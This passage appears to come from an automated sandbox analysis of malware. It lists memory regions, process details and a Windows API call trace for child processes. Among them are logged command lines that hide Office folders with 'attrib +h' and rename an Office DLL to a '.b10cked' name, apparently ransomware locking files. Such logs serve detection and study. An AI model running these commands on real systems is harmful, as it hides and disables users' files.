"\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 22534 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22535 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22536 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 22537 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22538 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 22539 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22540 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 22541 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22542 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22543 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 22544 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22545 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 345 os_tid = 0xfb4 Process: id = "282" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16920" os_pid = "0x908" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0xef8" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], 
"Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22546 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22547 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 22548 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 22549 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 22550 start_va = 0xcd0000 end_va = 0xcd6fff entry_point = 0xcd0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 22551 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22552 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22553 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22554 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22555 start_va = 0x7ffdf000 end_va = 0x7ffdffff 
entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22556 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22557 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22558 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22559 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 22560 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 22561 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 22562 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22563 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 22564 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22565 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" 
(normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22566 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 22567 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22568 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22569 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22570 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 22571 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22572 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22573 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 22574 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22575 start_va = 0x76ca0000 
end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 346 os_tid = 0xd88 Process: id = "283" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16920" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0xef8" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22576 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22577 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22578 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22579 start_va = 0x80000 end_va = 0x86fff entry_point = 0x80000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 22580 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 22581 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22582 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22583 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22584 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22585 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22586 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22587 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22588 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22589 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 22590 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 22591 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 22592 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22593 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 22594 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22595 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22596 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 22597 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22598 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22599 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22600 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 22601 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 
region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22602 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22603 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 22604 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22605 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 347 os_tid = 0xf3c Process: id = "284" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xf4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22643 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 22644 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22645 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22646 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 22647 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22648 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22649 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22650 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22651 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 22652 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22655 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22656 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22657 start_va = 0x50000 end_va 
= 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22658 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 22659 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 22660 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22661 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22662 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22663 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22664 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22665 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22666 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = 
"\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22667 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22668 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22669 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22670 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22671 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22672 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 22673 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 22674 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 22675 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 22676 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 22677 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id 
= 22678 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 348 os_tid = 0xed8 [0167.084] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfbd4 | out: lpSystemTimeAsFileTime=0x2cfbd4*(dwLowDateTime=0x9ade94a0, dwHighDateTime=0x1d440a9)) [0167.084] GetCurrentProcessId () returned 0xf4c [0167.084] GetCurrentThreadId () returned 0xed8 [0167.084] GetTickCount () returned 0x31831 [0167.084] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfbcc | out: lpPerformanceCount=0x2cfbcc*=22387291684) returned 1 [0167.084] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0167.084] __set_app_type (_Type=0x1) [0167.084] __p__fmode () returned 0x76b331f4 [0167.085] __p__commode () returned 0x76b331fc [0167.085] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0167.085] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0167.085] GetCurrentThreadId () returned 0xed8 [0167.085] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xed8) returned 0x38 [0167.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0167.085] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0167.085] SetThreadUILanguage (LangId=0x0) returned 0x409 [0167.087] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0167.087] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfb64 | out: phkResult=0x2cfb64*=0x0) returned 0x2 [0167.087] VirtualQuery (in: lpAddress=0x2cfb9b, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.087] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0167.087] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0167.088] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.088] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.088] GetConsoleOutputCP () returned 0x1b5 [0167.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0167.088] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0167.088] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.089] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0167.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.107] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0167.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.107] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0167.108] _get_osfhandle (_FileHandle=0) returned 0x3 [0167.108] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0167.108] _get_osfhandle (_FileHandle=0) returned 0x3 [0167.108] SetConsoleMode (hConsoleHandle=0x3, 
dwMode=0x1a7) returned 1 [0167.108] GetEnvironmentStringsW () returned 0x3d0210* [0167.108] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0167.108] GetEnvironmentStringsW () returned 0x3d0210* [0167.109] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0167.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cead4 | out: phkResult=0x2cead4*=0x40) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0xa0, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x1, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x0, lpData=0x2ceae0*=0x1, lpcbData=0x2cead8*=0x1000) returned 0x2 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x0, lpcbData=0x2cead8*=0x4) returned 0x0 [0167.109] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceadc, lpData=0x2ceae0, lpcbData=0x2cead8*=0x1000 | out: lpType=0x2ceadc*=0x4, lpData=0x2ceae0*=0x40, 